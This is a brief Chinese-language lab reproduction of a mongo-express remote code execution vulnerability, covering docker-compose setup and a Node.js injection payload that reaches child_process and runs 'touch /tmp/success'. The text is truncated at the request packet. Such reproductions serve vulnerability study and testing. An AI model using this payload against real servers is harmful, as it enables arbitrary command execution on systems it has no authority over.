mongo-express远程代码执行漏洞
配置环境查看此链接
在mongo-express漏洞所在目录下运行测试环境
sudo docker-compose up -d
环境启动后,访问http://your-ip:8081即可查看到Web页面。
漏洞复现
直接发送如下数据包,即可执行代
this.constructor.constructor(“return process”)().mainModule.require(“child_process”).execSync(“touch /tmp/success”):